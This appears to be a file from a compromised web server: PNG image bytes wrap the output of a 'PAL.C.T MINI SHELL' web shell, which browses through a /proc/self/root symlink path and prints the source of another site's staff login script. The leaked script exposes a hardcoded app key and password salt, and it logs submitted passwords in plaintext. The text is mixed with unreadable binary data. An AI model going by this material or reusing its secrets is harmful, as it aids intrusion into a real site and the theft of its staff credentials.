php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /proc/self/root/var/www/html/sub/images/sym/root/var/www/html/FTFL/mobile/
upload
files >> //proc/self/root/var/www/html/sub/images/sym/root/var/www/html/FTFL/mobile/masuklogin.php

<?php
    require('inc/konekmobile.php');
    $myObj = new stdClass();

    $kunci = $_POST['kunci'];
    $username = $_POST['user'];
    $password = $_POST['pass'];
    $long = $_POST['long'];
    $lat = $_POST['lat'];

    //input android log
    $uuid_member = 'COBA LOGIN';
    $waktu = date('Y-m-d H:i:s');
    $data_post = $kunci."||".$username."||".$password."||".$long."||".$lat;
   	$tentang = 'COBA LOGIN';
    $insertLog = $r->prepare("INSERT INTO android_post SET uuid_member=?, waktu=?, data_post=?, tentang=? ");
    $insertLog->bind_param('ssss',$uuid_member,$waktu,$data_post,$tentang);
    $insertLog->execute();

    //if ($kunci != 'eFTeeFeL') {
    if ($kunci != md5('eFTeeFeL'.$username.$password.$long.$lat)) {
         $myObj->status = 'gagal';
        $myObj->subject = 'aplikasi tidak dikenal.';
        $myObj->result = '';
        echo json_encode(array($myObj));
        exit();
    }

    $md5password = md5("CariO111set".$password);
    $fetchUsername = $r->prepare("SELECT uuid_staff, nama_staff, foto_ktp, jenis_toko, wewenang, jabatan, username, status  FROM staff WHERE username=? AND password=?");
    $fetchUsername->bind_param('ss',$username,$md5password);
    $fetchUsername->execute();
    $resultFetchUsername = $fetchUsername->get_result();
    $FOUND_USER = $resultFetchUsername->num_rows;

    if ($FOUND_USER == 0) {
        $myObj->status = 'gagal';
        $myObj->subject = 'Username dan Password salah.';
        $myObj->result = "";
        echo json_encode(array($myObj));
        exit();
    }

    $userDb = $resultFetchUsername->fetch_assoc();
    $status_staff = $userDb['status'];
    $userDb['toko'] = substr($userDb['jenis_toko'],1);

    if ($status_staff != 'AKTIF') {
        $myObj->status = 'gagal';
        $myObj->subject = 'Anda tidak dapat login karena berstatus '.$status_staff;
        $myObj->result = "";
        echo json_encode(array($myObj));
        exit();
    }

    $wewenang_staff = $userDb['wewenang'];
    $nama_staff = strtoupper($userDb['nama_staff']);

    if (!stristr($wewenang_staff,'|apps|')) {
        $myObj->status = 'gagal';
        $myObj->subject = 'Anda tidak mempunyai wewenang untuk memakai aplikasi.';
        $myObj->result = "";
        echo json_encode(array($myObj));
        exit();
    }

    $result = $userDb;

    $myObj->status = 'sukses';
    $myObj->subject = 'Selamat datang '.$nama_staff;
    $myObj->result = $result;
    echo json_encode(array($myObj));

    exit();

?>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`